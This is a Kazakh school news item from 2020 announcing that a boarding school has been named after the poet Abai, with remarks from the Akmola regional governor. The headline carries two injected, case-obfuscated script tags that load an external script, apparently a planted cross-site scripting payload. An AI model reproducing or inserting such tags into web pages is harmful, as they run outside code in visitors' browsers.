Қуанышты, тарихи жаңалық!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.10.2020

Қуанышты, тарихи жаңалық!
Мектебімізге Ұлы ақын, ағартушы, қазақтың жазба әдебиетінің және әдеби тілінің негізін салушы Абай атамыздың есімі берілді. Салтанатты іс-шараны Ақмола облысының әкімі Ермек Боранбайұлы ашып, "Абай атындағы мектеп-интернаты оқушыларының білім сапасы алдағы уақытта да осындай жоғары атаққа сай келетініне сенімдімін. Болашақта әлі де көптеген жетістіктер мен үлкен жеңістер күтеміз. Биылғы жылы Жұмыспен қамту жол картасы аясында мектеп-интернатының барлық корпустарының шатырына ағымдағы жөндеу жұмыстары және мектеп аумағын абаттандыру жұмыстары жүргізілді" деп атап өтті. Сөз соңында мектеп Ұжымына толағай табыстар тіледі. Бізде өз тарапымыздан Мектеп Ұжымы, оқушыларымыз, Ата-аналарымыз артылған сенімді ақтаймыз, Абай есімін жақсы жақтан ғана ататамыз деп сенім білдіреміз!

​

Просмотров: 744


Пікір қосу



Деректерді қолтаңбаға қосу